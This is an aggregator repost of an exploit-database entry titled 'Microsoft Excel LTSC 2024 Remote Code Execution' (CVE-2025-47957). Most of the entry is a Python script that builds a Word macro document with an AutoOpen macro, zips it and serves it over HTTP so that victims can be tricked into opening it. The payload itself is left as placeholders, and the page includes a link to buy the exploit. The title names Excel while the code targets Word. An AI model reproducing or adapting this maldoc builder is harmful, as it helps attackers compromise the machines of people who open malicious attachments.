惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Hacker News: Ask HN
Hacker News: Ask HN
N
News and Events Feed by Topic
Forbes - Security
Forbes - Security
The Last Watchdog
The Last Watchdog
TaoSecurity Blog
TaoSecurity Blog
Schneier on Security
Schneier on Security
SecWiki News
SecWiki News
V
Vulnerabilities – Threatpost
Project Zero
Project Zero
O
OpenAI News
W
WeLiveSecurity
Security Archives - TechRepublic
Security Archives - TechRepublic
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
H
Hacker News: Front Page
Cisco Talos Blog
Cisco Talos Blog
Spread Privacy
Spread Privacy
Help Net Security
Help Net Security
P
Privacy & Cybersecurity Law Blog
K
Kaspersky official blog
S
Security @ Cisco Blogs
Latest news
Latest news
AWS News Blog
AWS News Blog
U
Unit 42
Martin Fowler
Martin Fowler
阮一峰的网络日志
阮一峰的网络日志
S
Secure Thoughts
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Know Your Adversary
Know Your Adversary
Scott Helme
Scott Helme
博客园 - 司徒正美
B
Blog RSS Feed
C
Check Point Blog
Hacker News - Newest:
Hacker News - Newest: "LLM"
D
Docker
Google Online Security Blog
Google Online Security Blog
Jina AI
Jina AI
aimingoo的专栏
aimingoo的专栏
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Last Week in AI
Last Week in AI
月光博客
月光博客
C
CXSECURITY Database RSS Feed - CXSecurity.com
S
SegmentFault 最新的问题
NISL@THU
NISL@THU
T
The Blog of Author Tim Ferriss
C
Cisco Blogs
Attack and Defense Labs
Attack and Defense Labs
小众软件
小众软件

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Microsoft Excel LTSC 2024 Remote Code Execution
2025-07-31 · via The Exploit Database - CXSecurity.com

Microsoft Excel LTSC 2024 Remote Code Execution

# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE) # Author: nu11secur1ty # Date: 06/16/2025 # Vendor: Microsoft # Software: https://www.microsoft.com/en/microsoft-365/excel?market=af # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751 # CVE-2025-47957 # Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise ## Description: The attacker can trick any user into opening and executing their code by sending a malicious DOCX file via email or a streaming server. After the execution of the victim, his machine can be infected or even worse than ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE MACROS OPTIONS FROM YOUR OFFICE 365!!! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: ``` #!/usr/bin/python # CVE-2025-47957 by nu11secur1ty import os import time import zipfile import threading import http.server import socket import socketserver import win32com.client def get_local_ip(): """Get the LAN IP address of the current machine.""" try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) # External DNS, just for routing ip = s.getsockname()[0] s.close() return ip except: return "127.0.0.1" def create_docm_with_auto_macro(filename): script_dir = os.path.dirname(os.path.abspath(__file__)) full_path = os.path.join(script_dir, filename) word = win32com.client.Dispatch("Word.Application") word.Visible = False doc = word.Documents.Add() doc.Content.Text = "This document contains an auto-starting macro." vbproject = doc.VBProject vbcomponent = vbproject.VBComponents.Add(1) # Standard Module macro_code = ''' Sub AutoOpen() Call YOUR_PoC End Sub Sub YOUR_PoC() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "YOUR_EXPLOIT_HERE" TaskID = YOUR_TASK_HERE If Err <> 0 Then MsgBox "Can't start " & Program End If End Sub ''' vbcomponent.CodeModule.AddFromString(macro_code) wdFormatXMLDocumentMacroEnabled = 13 doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled) doc.Close() word.Quit() print(f"[+] Macro-enabled .docm saved at: {full_path}") return full_path def compress_to_zip(filepath): zip_path = filepath + '.zip' with zipfile.ZipFile(zip_path, 'w') as zipf: zipf.write(filepath, arcname=os.path.basename(filepath)) print(f"[+] Compressed to ZIP: {zip_path}") return zip_path def start_http_server(directory, port=8000): os.chdir(directory) handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("", port), handler) ip = get_local_ip() print(f"[+] HTTP server running at: http://{ip}:{port}/") thread = threading.Thread(target=httpd.serve_forever) thread.daemon = True thread.start() return httpd if __name__ == "__main__": filename = "CVE-2025-47957.docm" docm_path = create_docm_with_auto_macro(filename) zip_path = compress_to_zip(docm_path) server = start_http_server(os.path.dirname(docm_path)) try: print("[*] Server running — press Ctrl+C to stop...") while True: time.sleep(1) except KeyboardInterrupt: print("\n[!] Ctrl+C detected — shutting down server...") server.shutdown() print("[+] The Exploit Server stopped. Goodbye!") ``` # Reproduce: [href](https://www.youtube.com/watch?v=r4NsGrO56yo) # Buy an exploit only: [href](https://satoshidisk.com/pay/COeJqt) # Time spent: 01:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}